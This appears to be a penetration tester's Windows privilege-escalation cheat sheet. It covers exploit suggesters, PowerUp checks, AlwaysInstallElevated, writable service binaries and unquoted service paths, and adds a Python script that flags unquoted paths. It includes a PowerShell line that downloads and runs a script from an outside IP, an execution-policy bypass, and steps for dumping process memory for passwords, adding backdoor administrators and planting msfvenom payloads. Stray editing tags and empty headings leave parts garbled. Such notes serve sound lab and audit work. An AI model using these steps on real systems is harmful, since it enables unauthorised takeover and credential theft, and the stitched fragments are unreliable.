Privesc Openings

Windows Exploiter Suggester

# https://github.com/bitsadmin/wesng

# 1. Run systeminfo on the target, then copy and paste the output into system.txt on Kali
systeminfo

# 2. Update Windows Exploit Suggester. This downloads the bulletin database as an .xls file
python windows-exploit-suggester.py --update

# 3. Compare the systeminfo output against the database to suggest exploits
python windows-exploit-suggester.py --database <generated xls> --systeminfo system.txt

Sherlock

Find All Vulns

# find-allvulns, method 1: load Sherlock.ps1 into memory from a web server and run it
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/Sherlock.ps1')
find-allvulns

# find-allvulns, method 2: import the module from disk with the execution policy bypassed
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; find-allvulns}"

PowerUp Invoke-AllChecks

Alternatively

DLL Hijacking (PowerUp)

Dump Process

Dump the memory of a process (e.g. a browser) to look for credentials. Transfer the dump to Kali and run 'strings' on it, grepping for login or password.

Using Token and AutoLogon creds

PowerUp's Invoke-AllChecks should find the plaintext AutoLogon password. Create a privileged token object from those credentials to run a reverse shell.
</gre_replace>
<gr_replace lines="43-43" cat="clarify" orig="Always Install">
When AlwaysInstallElevated is enabled, install a crafted MSI that creates a privileged user during installation.

AlwaysInstallElevated

Always Install Elevated to create privesc user after installation.

ICALCS

Look for folders where the current user has write (W) permissions and overwrite the binary there with a binary payload. For Windows XP and below, use cacls instead.

WMIC

# Any missing patches?
wmic qfe get Caption,Description,HotFixID,InstalledOn

Check exploit-db for matching exploits, e.g.:

searchsploit MS16 windows local

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"

Affects Windows Vista/2008 6.1.6000 x32, Windows Vista/2008 6.1.6001 x32, Windows 7 6.2.7600 x32, Windows 7/2008 R2 6.2.7600 x64. (No good exploit; 'Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)' is unlikely to work.)

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

Stored Credentials

# 32 or 64 bit?
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

# List user account names and SIDs
wmic useraccount get name,sid

# List drives
wmic logicaldisk get caption || fsutil fsinfo drives

Unquoted Service Paths

Privesc by placing a binary payload somewhere in an unquoted service path so that it is executed when the service starts or stops, or on reboot. How? Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe. If you look at the registry entry for this service with Regedit, you can see the ImagePath value is: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe (unquoted).

To prevent it being exploited, the path should have been quoted: "C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe". Because it is not, when Windows attempts to run this service it treats each space as a possible end of the executable name, tries the resulting paths in order, and runs the first EXE it finds, hitting our payload if one of those paths is writable.

To discover unquoted service path
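The lookup described above, as an added audit example that is not part of the original page: it parses constructed `sc qc`-style output, flags services whose BINARY_PATH_NAME is unquoted and contains spaces, and lists the executables Windows would try in order, which are exactly the locations whose directories must not be writable by unprivileged users.

```python
import re

# Constructed sample of concatenated `sc qc` output for three services (not from a real host).
SC_QC_SAMPLE = r"""
SERVICE_NAME: VulnSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
SERVICE_NAME: SafeSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\svc.exe" -run
SERVICE_NAME: SysSvc
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
"""


def parse_sc_qc(text):
    """Map SERVICE_NAME -> BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", line)
        if m and current:
            services[current] = m.group(1)
    return services


def lookup_candidates(image_path):
    """Return the executables CreateProcess may try, in order, for an unquoted
    path containing spaces. Empty list means quoted or space-free (not affected).
    Assumes each truncated prefix has no extension, so Windows appends .exe."""
    if image_path.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)  # drop trailing arguments
    exe = m.group(1) if m else image_path
    if " " not in exe:
        return []
    words = exe.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))] + [exe]


def audit(text):
    """Services whose image path is unquoted with spaces -> ordered lookup candidates.
    Each candidate's parent directory should be checked for write access (icacls/accesschk)."""
    return {name: lookup_candidates(path)
            for name, path in parse_sc_qc(text).items() if lookup_candidates(path)}
```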

Writable Path (accesschk.exe > upnphost)

1. Run accesschk to find any writable service path
2. Query the service with sc qc
3. Method 1: add a backdoor user to the administrators group
4. Method 2: add a binary payload

Querying Service

Method 1: Adding backdoor user to admin group

Method 2: Adding binary payload

Services Registry

Create a payload, e.g. exploit.exe with msfvenom, and place it in a writable folder such as 'temp'.

Start the service: sc start regsvc
